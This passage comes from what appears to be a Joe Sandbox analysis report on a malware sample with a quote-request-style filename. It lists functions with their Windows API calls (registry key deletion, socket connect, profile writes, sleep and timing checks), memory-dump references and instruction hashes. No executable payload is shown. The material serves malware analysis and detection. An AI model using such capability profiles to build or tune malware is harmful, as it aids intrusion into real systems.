                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                        • String ID:
                                                        • API String ID: 327565842-0
                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                        Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                        • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                        Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 2095303065-0
                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                        Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: RectWindow
                                                        • String ID:
                                                        • API String ID: 861336768-0
                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                        Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32 ref: 00449598
                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                        • _wcslen.LIBCMT ref: 0044960D
                                                        • _wcslen.LIBCMT ref: 0044961A
                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                        • String ID:
                                                        • API String ID: 1856069659-0
                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                        Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                        • TrackPopupMenuEx.USER32(03016510,00000000,00000000,?,?,00000000), ref: 00447991
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CursorMenuPopupTrack$Proc
                                                        • String ID:
                                                        • API String ID: 1300944170-0
                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                        Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 1822080540-0
                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                        Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                        • String ID:
                                                        • API String ID: 659298297-0
                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                        Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(03011A38,000000F1,00000000,00000000), ref: 00440E6E
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(03011A38,000000F1,00000001,00000000), ref: 00440E9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableMessageSend$LongShow
                                                        • String ID:
                                                        • API String ID: 142311417-0
                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                        Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                        Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                        • _wcslen.LIBCMT ref: 004458FB
                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 3087257052-0
                                                        • Opcode ID: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                        • Opcode Fuzzy Hash: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                        Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 245547762-0
                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                        Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                        • String ID:
                                                        • API String ID: 2338827641-0
                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                        Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                        Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
